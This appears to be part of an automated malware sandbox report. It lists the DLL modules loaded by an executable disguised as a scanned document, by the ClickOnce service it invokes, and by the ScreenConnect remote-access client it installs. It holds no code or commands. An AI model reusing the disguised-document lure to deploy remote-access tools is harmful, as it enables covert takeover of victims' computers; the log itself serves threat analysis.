Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
